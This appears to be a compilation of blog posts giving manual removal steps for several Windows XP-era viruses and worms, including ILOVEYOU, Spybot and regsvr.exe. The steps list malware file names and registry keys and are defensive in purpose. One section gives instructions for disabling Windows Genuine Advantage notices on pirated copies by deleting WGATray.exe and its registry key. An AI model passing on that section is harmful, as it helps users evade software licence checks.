THE VIRUS WAS REPORTED BY ONE OF OUR READERS AND SURPRISINGLY THIS VIRUS SPREADS UNDER THE NAMES OF SONGS.EXE, KHATARNAK.EXE AND PICTURES.EXE APART FROM OTHERS.




STEPS TO REMOVE THIS VIRUS:



1. TURN OFF THE SYSTEM RESTORE.



2. BOOT IN THE SAFE MODE.



3. GO TO ADD/REMOVE PROGRAMS AND REMOVE ANY PROGRAMS REFERENCING “W32/SILLYFDC,” “WORM.IM.SOHANAD” OR “KHATARNAK.EXE (IF ANY)



4. RUN TASK MANAGER AND KILL THE PROCESS (IF ANY) RELATING TO THESE EXE

5. SEARCH THE HARD DRIVE WITH THE NAME CORRESPONDING TO KHATARNAK.EXE, SONGS.EXE AND PICTURES.EXE ETC.



6. TYPE MSCONFIG IN THE RUN BOX AND REMOVE CHECKMARKS NEXT TO ANY “KHATARNAK.EXE” OR “XSAFE.EXE” ENTRIES ON THE “STARTUP” TAB



7. RUN THE REGISTRY EDITOR AND DELETE THE FOLLOWING ENTRIES (IF ANY):



HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\SRSKL\SECURITY\”SECURITY” = “[BINARY DATA]”

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\SRSKL\”TYPE” = “1″

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\SRSKL\”START” = “3″

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\SRSKL\”IMAGEPATH” = “%WINDIR%\FONTS\SRSKL.FON”

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\SRSKL\”ERRORCONTROL” = “0″

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\SRSKL\”DISPLAYNAME” = “SRSKL”

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\DOGKILLER\SECURITY\”SECURITY” = “[BINARY DATA]”

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\DOGKILLER\”TYPE” = “1″

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\DOGKILLER\”START” = “3″

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\DOGKILLER\”IMAGEPATH” = “%TEMP%\~DWPHX.TMP”

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\DOGKILLER\”ERRORCONTROL” = “0″

HKEY_LOCAL_MACHINE\SYSTEM\CONTROLSET001\SERVICES\DOGKILLER\”DISPLAYNAME” = “DOGKILLER”

8. REBOOT

THE VIRUS SHOULD HAVE GONE.

THIS WAS THE ERROR MESSAGE FACED BY ONE OF OUR READERS THAT WHEN HE BOOTS THE PC UP, THE CSRCS.EXE ERROR MESSAGE COMES UP ON THE SCREEN.




CSRSC.EXE IS A PROCESS WHICH IS REGISTERED AS W32.SPYBOT.CF VIRUS. DO NOT CONFUSE IT WITH CSRSS.EXE WHICH IS AN IMPORTANT FILE USED BY WINDOWS. THE ATTACKERS OF THIS VIRUS CAN ACCESS OUR COMPUTER AND GAIN ACCESS TO SOME IMPORTANT DATA REMOTELY.



STEPS TO REMOVE THIS VIRUS:

1. SCAN THE SYSTEM WITH A GOOD AND UPDATED ANTI VIRUS.



2. OPEN TASK MANAGER, LOCATE THIS EXE (CSRCS.EXE OR CSRSC.EXE BUT NOT CSRSS.EXE), AND KILL THE PROCESS.



3. NOW TYPE MSCONFIG IN THE RUN BOX, AND THEN GO TO STARTUP TAB.



4. LOCATE THIS EXE FILE, IF ANY, AND THEN REMOVE IT FROM THERE AS WELL.



5. NOW SEARCH THE FILE IN THE C: DRIVE.



6. PERMANENTLY DELETE THE FILE (CSRCS.EXE OR CSRSC.EXE ONLY) FROM THE COMPUTER.



7. REBOOT THE PC FOR CHANGES TO TAKE PLACE.



UPDATE



AFTER DOING THE ABOVE STEPS, YOU NEED TO CLEAN THE REGISTRY AS WELL.



1.NAVIGATE TO HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWSNT\CURRENTVERSION\WINLOGON\

2.ON THE RIGHT SIDE, THERE IS A KEY NAMED “SHELL”, IT MAY BE HAVING A VALUE “EXPLORER.EXE CSRCS.EXE”. JUST MODIFY IT TO DELETE THE CSRCS.EXE FROM IT (NOT EXPLORER.EXE). RESTART THE COMPUTER

THE VIRUS SHOULD HAVE GONE.

MY PC WAS WORKING ALL FINE UNTIL I FIGURED OUT THAT GROUP POLICY GPEDIT.MSC WAS NOT OPENING ON MY SYSTEM. I WANTED TO OPEN THE GROUP POLICY EDITOR FOR SOME WORK AND I WAS SHOCKED TO FIND THAT NOT ONLY THE GPEDIT.MSC, EVEN THE OTHER COMMANDS WITH MSC EXTENSIONS, WERE NOT WORKING LIKE SERVICES.MSC, DEVMGMT.MSC, COMPMGMT.MSC ETC.








THEN I TRIED OPENING THE EDITOR BY DOUBLE CLICKING THE GPEDIT.MSC INSIDE THE SYSTEM32 FOLDER AND I GOT THE SAME ERROR “ACCESS IS DENIED”. WHAT WAS STRANGE WAS THAT I WAS ACCESSING THE EDITOR FROM MY ADMINISTRATOR ACCOUNT ONLY.



I TRIED FOLLOWING THINGS:



• THE FIRST SUSPECT IS, OF COURSE, VIRUS, THUS I SCANNED MY WHOLE SYSTEM WITH THE UPDATED ANTI VIRUS BUT IT DIDN’T FIND ANY.

• THEN I SCANNED IT WITH WINDOWS DEFENDER BUT IT ALSO DIDN’T FIND ANY MALICIOUS SOFTWARE.



• I REBOOTED THE SYSTEM AND ENTERED IN THE SAFE MODE BUT THE COMMANDS WERE NOT WORKING IN THAT EITHER.



SOLUTION:

THEN I FINALLY DECIDED TO RUN SYSTEM RESTORE AND RESTORED THE SYSTEM TO SOME SAFE STATE I CREATED WHEN THE PC WAS WORKING ALL FINE (GOOD PRACTICE TO CREATE A CHECKPOINT WHEN THE SYSTEM IS FINE, ISN’T IT). I WAS RELIEVED WHEN THIS SOLVED MY PROBLEM.



NOTE: TRY TO RESTORE THE SYSTEM TO A RESTORE POINT CREATED LONG AGO.



UPDATE 1



SINCE THE PROBLEMS VARY FOR DIFFERENT USERS, INSTALLING MICROSOFT MANAGEMENT CONSOLE 3.0 FOR WINDOWS XP AGAIN (AS SUGGESTED BY ONE OF OUR VIEWERS) MAY ALSO WORK FOR YOU.



DOWNLOAD MMC



UPDATE 2 (BEST SOLUTION WORKING):

AFTER ALL THE EFFORTS TO FIND OUT THE SOLUTION, WE HAVE BEEN ABLE TO FIND THE SOLUTION TO THIS PROBLEM (THANKS TO OUR ALERT READER DICKENS). I AM DESCRIBING THE SOLUTION GIVEN BY HIM AND IS WORKING ALL FINE (I HAVE TESTED MYSELF ON MY PC)



•OPEN REGISTRY EDITOR (REGEDIT.EXE).

•NOW TRAVERSE TO HKEY_CLASSES_ROOT\.MSC AND DELETE THE REGISTRY ENTRY ON THE RIGHT SIDE.

•AFTER DELETING IT WHEN YOU AGAIN TYPE GPEDIT.MSC IN RUN BOX, IT WILL OPEN AN “OPEN WITH” DIALOG.

•NOW SELECT THE SECOND OPTION AND BROWSE TO GET A NEW OPTION; BROWSE TO C:\WINDOWS\SYSTEM32\MMC.EXE

•A NEW OPTION “MICROSOFT MANAGEMENT CONSOLE” WILL APPEAR IN THE WINDOW.

•SELECT THIS OPTION AND REMEMBER TO CHECK THE BOX BELOW TO ALWAYS RUN THE COMMAND WITHOUT DOING THIS AGAIN AND AGAIN.

•THAT’S IT, ALL .MSC EXTENSIONS WILL NOW OPEN.

MICROSOFT HAS STARTED BUGGING THE USERS OF NON GENUINE COPIES OF WINDOWS. IF YOU ARE ALSO RUNNING A NON GENUINE OR PIRATED COPY OF WINDOWS THEN THERE IS A FULL CHANCE OF YOU GETTING THIS NOTIFICATION ONE DAY OR THE OTHER.








THE PROBLEM WAS REPORTED BY ONE OF OUR VIEWERS THAT WHEN SHE UPDATED HER COPY OF WINDOWS WITH WINDOWS UPDATE THEN HER SYSTEM STARTED SHOWING THIS NOTIFICATION THAT READS “YOU MAY BE A VICTIM OF SOFTWARE COUNTERFEITING” AND “THIS COPY OF WINDOWS DOES NOT PASS GENUINE WINDOWS VALIDATION”.







THESE NOTIFICATIONS START COMING BACK AGAIN AFTER SOME TIME AND DO NOT FEEL GOOD. THOUGH I NEVER ENCOURAGE PIRACY BUT HERE IS HOW YOU CAN REMOVE THIS PROBLEM:



1. BEFORE DOING ANYTHING SERIOUS TRY RESTORING YOUR SYSTEM. IF THE PROBLEM IS OCCURRING AFTER THE WINDOWS UPDATE THEN SYSTEM RESTORE WILL SURELY HELP.



2. BUT IF IT DOES NOT THEN DO TRY THIS, LAUNCH WINDOWS TASK MANAGER.



3. LOCATE THE PROCESS “WGATRAY.EXE” AND END IT.



4. LOG IN INTO THE SAFE MODE AND DELETE THE FILE WGATRAY.EXE FROM C:\WINDOWS\SYSTEM32



5. ALSO DELETE THE WGATRAY.EXE FROM C:\WINDOWS\SYSTEM32\DLLCACHE



6. TYPE REGEDIT IN RUN TO OPEN REGISTRY EDITOR, NAVIGATE TO HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY KEY.



7. DELETE THE FOLDER WGALOGON AND ALL OF ITS CONTENTS.



8. RESTART THE PC NORMALLY.

THE HAPPY BIRTHDAY VIRUS IS PICKING UP GREAT DEAL OF POPULARITY AND IS SPREADING A LOT FASTER AS COMPARED TO OTHER VIRUS. THIS VIRUS MOSTLY SPREADS THROUGH E-MAILS AND FLASH DRIVES LIKE PEN DRIVES.


FOLLOWING ARE THE PROBLEMS THAT THIS VIRUS CAUSES:



1. DISABLES REGISTRY EDITOR, FOLDER OPTIONS AND COMMAND PROMPT.

2. SHOWS A TOOL TIP NEAR THE MOUSE CURSOR WITH THE TEXTS ‘HAPPY BIRTHDAY’.

3. RUNS A PROCESS NAMED EITHER “EXPLORCE.EXE” OR “EXPLORCR.EXE” IN THE BACKGROUND PROCESSES THAT CONFUSES WITH EXPLORER.EXE

4. OPERATING SYSTEM SHOWS “NTLDR MISSING” PROBLEM.



SOLUTION TO FIX THE PROBLEM:



1. FIRST OF ALL WE NEED TO GET OUR FOLDER OPTIONS AND REGISTRY EDITOR BACK (TO DO THIS, REFER THIS POST OF MINE).



2. NOW KILL THE PROCESS “EXPLORCR.EXE” OR “EXPLORCE.EXE” RUNNING IN BACKGROUND.



3. NOW GO TO FOLDER OPTIONS -> TICK SHOW HIDDEN FILES AND FOLDERS AND UNCHECK HIDE PROTECTED OPERATING SYSTEM FILES.



4. DELETE THE EXE FROM “C:\WINDOWS\SYSTEM32” FOLDER.



5. ALSO DELETE THE “AUTORUN.INF” FILE FROM THE ROOT DRIVE.



6. NOW TO FIX NTLDR MISSING PROBLEM, INSERT XP CD AND COPY ‘NTLDR’ FROM I386\NTLDR TO %SYSTEMDRIVE%



7. REBOOT THE SYSTEM.



THE PROBLEM MUST HAVE GONE.

RECENTLY MY COMPUTER WAS INFECTED WITH THIS VIRUS CALLED SYSDATE.EXE THAT WAS INSIDE THE RECYCLER FOLDER IN THE C: DRIVE. I KNEW THAT IT WAS A VIRUS SINCE MY PC DIDN’T HAVE THE RECYCLER FOLDER EARLIER. THUS THE LOCATION OF THE VIRUS WAS C:\RECYCLER\S-1-5-21-8324555943-4443154761-431384085-6428\SYSDATE.EXE


SYMPTOMS OF THIS VIRUS:

• IN THE RECYCLER FOLDER THERE WAS ANOTHER FOLDER BUT IN THE LOOKS OF THE RECYCLE BIN WHOSE NAME WAS SOMETHING LIKE S-1-5-21-8324555943-4443154761-431384085-6428 AND ON DOUBLE CLICKING IT, I CAME ACROSS ALL THE FILES WHICH WERE THERE IN THE RECYCLE BIN.

• THERE WAS AN ENTRY IN THE REGISTRY EDITOR NAMED TASKMAN THAT CAME BACK AGAIN AND AGAIN ON DELETING.

• THERE WERE NO CHANGES IN THE STARTUP AND TASK MANAGER IN MY SYSTEM BUT IF THERE IS ANY IN YOURS THEN REMOVE THE PROCESS FROM STARTUP AND KILL FROM TASK MANAGER.

NOTE: GO TO FOLDER OPTIONS -> VIEW TAB -> CHECK THE OPTION OF SHOW HIDDEN FILES AND FOLDERS AND UNCHECK THE OPTION OF HIDE PROTECTED OPERATING SYSTEM FILES.

HERE ARE THE STEPS HOW I REMOVED THE VIRUS AND FIXED MY PROBLEM.

1. FIRST OF ALL TO SEE ALL THE CONTENTS IN THE RECYCLER FOLDER WE NEED TO CHANGE THE ATTRIBUTES OF THE FOLDER.

2. OPEN COMMAND PROMPT (BY TYPING CMD IN THE RUN BOX) AND TYPE

ATTRIB C:\RECYCLER –R –H –S PRESS ENTER.

THEN AGAIN TYPE

ATTRIB C:\RECYCLER\ S-1-5-21-8324555943-4443154761-431384085-6428 –R –H –S AND PRESS ENTER.

3. THE SHAPE AND LOOK OF THE FOLDER WILL CHANGE FROM THAT OF RECYCLE BIN TO A NORMAL FOLDER WHICH WILL NOW SHOW ALL THE CONTENTS INSIDE IT.

4. THERE WERE TWO FILES INSIDE THE S-1-5-21-8324555943-4443154761-431384085-6428 FOLDER, SYSDATE.EXE AND AUTORUN.INF, BOTH OF WHICH WERE UNDELETABLE.

5. NOW TO DELETE RECYCLER, S-1-5-21-8324555943-4443154761-431384085-6428, AUTORUN.INF AND SYSDATE.EXE FILES, FIRST KILL THE EXPLORER.EXE PROCESS FROM THE TASK MANAGER.

6. YOUR EXPLORER WILL SHUT DOWN BUT TASK MANAGER WOULD BE STILL RUNNING. NOW GO TO FILE -> NEW TASK. CLICK ON BROWSE

7. GO TO THE RECYCLER FOLDER IN THIS BROWSE FUNCTION AND SHIFT DELETE THE SYSDATE.EXE AND AUTORUN.INF FILES THERE, THEY WILL GET EASILY DELETED AND WILL COME BACK.

8. THEN DELETE THE RECYCLER FOLDER AS WELL.

9. AFTER YOU HAVE DONE WITH REMOVING THE VIRUSES, TYPE EXPLORER.EXE IN THE NEW TASK SECTION WHICH WILL BRING THE EXPLORER RUNNING AGAIN.

10. TYPE REGEDIT IN THE RUN BOX TO OPEN REGISTRY EDITOR, NAVIGATE TO HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON AND DELETE THE TASKMAN KEY IN THE RIGHT PANE.

REFRESH TO SEE IF IT COMES AGAIN. IF IT DOES NOT COME AGAIN, YOUR VIRUS WILL HAVE BEEN REMOVED.

11. IF YOUR COMPUTER HAS MORE THAN ONE USER THEN NAVIGATE TO HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON AND EDIT THE SHELL KEY ON RIGHT SIDE. EDIT IT TO REMOVE THE C:\RECYCLER\ S-1-5-21-8324555943-4443154761-431384085-6428 VALUE.

THE VALUE SHOULD BE ONLY EXPLORER.EXE

RESTART THE COMPUTER TO SEE THE VIRUS REMOVED.

I DID ALL THE ABOVE STEPS ON MORE THAN ONE PC AND IT WORKED ON EACH OF THEM

ONE OF OUR READERS WANTED TO KNOW THE METHOD TO REMOVE DRIVEGUARD.EXE VIRUS WHICH IS ALSO KNOWN BY THE NAMES FLASHGUARD.EXE AND DRIVEMONITOR.EXE. SO HERE GOES THE SOLUTION THAT IS BIT DIFFERENT FROM THE OTHER VIRUS REMOVAL METHODS.


WHAT DRIVEGUARD.EXE DOES?

• ADDS ITSELF TO STARTUP AND THE TASK MANAGER.

• ADDS A REGISTRY KEY FOR MAKING CHANGES IN THE REGISTRY EDITOR.

• ADDS AUTORUN.INF FILE IN THE PEN DRIVE

• ADDS SOME MALICIOUS TEMPORARY FILES IN THE SYSTEM.

SOLUTION:

1. BOOT THE COMPUTER IN THE SAFE MODE.

2. OPEN THE TASK MANAGER AND KILL THE PROCESSES WITH NAMES DRIVEGUARD.EXE/FLASHGUARD.EXE/DRIVEMONITOR.EXE

3. OPEN MY COMPUTER AND SEARCH FOR THE SAME VIRUS NAMES BUT DON’T FORGET TO CHECK ALL THE BOXES IN THE ‘MORE ADVANCED OPTIONS’ OF SEARCH. DELETE ALL THE FILES.

4. NOW SEARCH FOR .TMP.EXE AND DELETE DRIVEGUARD.TMP.EXE AND GHMPG.TMP.EXE FILES, IF ANY.

5. OPEN THE MSCONFIG, NOW GO TO STARTUP PROCESSES AND UNCHECK THE FLASHGUARD PROCESS TO REMOVE IT FROM THE STARTUP LIST.

6. OPEN REGEDIT AND NAVIGATE TO HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\FLASHGUARD.

7. CLICK ON FLASHGUARD AND DELETE THE KEY.

THE VIRUS WOULD HAVE BEEN REMOVED.

THERE ARE SO MANY TYPES OF COMPUTER VIRUSES IN THIS WORLD THAT REMOVING THEM AND FINDING A SPECIFIC SOLUTION FOR EACH OF THEM IS A BIG ASK. ONE SUCH VIRUS THAT SCREWED ME IS REGSVR.EXE CLASSIFIED AS A W32.IMAUT WORM.




IT HAS BECOME A DAILY ROUTINE THAT WHEN I PLUG MY PEN DRIVE IN MY COLLEGE SYSTEMS (FULL OF ALL KINDS OF VIRUSES), IT GETS INFECTED BY THE VIRUSES INSTANTLY. THOUGH THE ANTI VIRUS I USE (SYMANTEC) SUCCESSFULLY DETECTS AND REMOVE THEM BUT I FEEL THAT I SHOULD DISCUSS THE STEPS TO REMOVE REGSVR.EXE VIRUS.



WHAT THE REGSVR.EXE VIRUS DOES?



• THIS WORM CREATES FOLDERS AND A REGISTRY ENTRY TO ENABLE ITS AUTOMATIC EXECUTION AT EVERY SYSTEM STARTUP.



• THIS WORM ALSO CREATES A SCHEDULED TASK TO ENABLE ITS AUTOMATIC EXECUTION AT A SPECIFIED DATE AND/OR TIME.



• IT ALSO CREATES AUTORUN.INF FILE FOR ITS AUTO EXECUTION.

SOLUTION TO FIX THE PROBLEM:



1. IF THE TASK MANAGER AND REGISTRY EDITOR IS DISABLED THEN WE NEED TO ENABLE THEM FIRST. READ THIS POST.



2. DELETE THE AUTORUN.INF FILE CREATED BY THE VIRUS. READ THIS POST TO KNOW HOW TO DO THAT.



3. NOW TYPE MSCONFIG IN THE RUN DIALOG AND CLICK ON STARTUP TAB.



4. LOOK FOR REGSVR AND UNCHECK ANY OPTIONS, CLICK OK.



5. NOW TRAVERSE TO CONTROL PANEL -> SCHEDULED TASKS, AND DELETE THE AT1 TASK THAT MIGHT BE LISTED THERE.



6. TYPE REGEDIT IN THE RUN DIALOG TO OPEN THE REGISTRY EDITOR.



7. CLICK ON EDIT -> FIND AND SEARCH FOR REGSVR.EXE



8. JUST DELETE ALL THE OCCURRENCES OF REGSVR.EXE VIRUS (DO NOT CONFUSE IT WITH REGSVR32.EXE WHICH IS NOT A VIRUS).



9. NAVIGATE TO ENTRY HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON AND MODIFY THE ENTRY SHELL = “EXPLORER.EXE REGSVR.EXE” TO DELETE THE REGSVR.EXE FROM IT.



10. NOW TO ACTUALLY DELETE THE VIRUS FROM THE SYSTEM GO TO SYSTEM32 FOLDER AND DELETE THE REGSVR.EXE VIRUS FILE FROM THERE (YOU WILL NEED TO UNCHECK THE OPTION OF “HIDE PROTECTED SYSTEM FILES AND FOLDERS” IN FOLDER OPTIONS TO VIEW THE VIRUS FILE).



REBOOT THE SYSTEM FOR CHANGES TO TAKE PLACE.

GOSH! THERE ARE SO MANY VIRUS AND OF DIFFERENT NAMES THAT THE VIRUS CREATORS SEEMS TO RUN SHORT OF THE NAMES. “I LOVE YOU VIRUS” IS A STRANGE NAME USED BY ITS CREATOR. REQUESTED BY ONE OF OUR VIEWERS, HERE ARE THE STEPS TO REMOVE THE VIRUS.



BUT BEFORE DISCUSSING THE SOLUTION, LET’S SEE THE DETAILS OF THIS VIRUS. THE “I LOVE YOU” VIRUS ALSO KNOWN AS THE “LOVE” VIRUS AND SPREADS MAINLY VIA EMAILS. THE NAME IS BELIEVED TO ORIGINATE FROM THE SUBJECT OF THE MAILS BUT THERE HAVE BEEN SOME OTHER MODIFICATIONS IN THE NAME LIKE “MOTHER’S DAY” AND “JOKE” VIRUS.



THIS IS THE FORMAT OF THE E-MAIL THAT CONTAINS THIS VIRUS.

SENDER: SOMEONE A USER KNOW

SUBJECT: ILOVEYOU

BODY: KINDLY CHECK THE ATTACHED LOVELETTER COMING FROM ME.

ATTACHMENT: LOVE-LETTER-FOR-YOU.TXT.VBS



THE DEFAULT SETTINGS OF WINDOWS DON’T DISPLAY THE LAST EXTENSION AND THIS IS WHERE A USER THINKS THIS VIRUS AS A NORMAL TEXT DOCUMENT.



STEPS TO REMOVE LOVE VIRUS:



1. KILL ANY PROCESS CONTAINING “LOVE” FROM THE TASK MANAGER; ALSO REMOVE IT FROM THE COMPUTER’S STARTUP LIST (RUN MSCONFIG IN THE RUN BOX).



2. SEARCH YOUR HARD DISK FOR FOLLOWING ENTRIES:



LOVE-LETTER-FOR-YOU.TXT.VBS

LOVE-LETTER-FOR-YOU.HTM

MSKERNEL32.VBS

WIN32DLL.VBS

WIN-BUGSFIX.EXE



PERMANENTLY DELETE THE FILES FOUND FROM ABOVE SEARCH RESULT.



3. RUN REGEDIT IN THE RUN BOX AND DELETE THE FOLLOWING ENTRIES, IF ANY:



HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\MSKERNEL32

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICES\WIN 32DLL

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\WIN-BUGSFIX HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\WINFAT32=WINFAT32.EXE



THIS WILL RESTORE THE SETTINGS BACK TO THE ORIGINAL AFTER REBOOTING THE COMPUTER.

4. YOU MAY ALSO LIKE TO CHANGE THE DEFAULT URL IN THE REGISTRY TO:

HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\START PAGE “HTTP://WWW.MSN.COM” OR ANY OF YOUR CHOICE.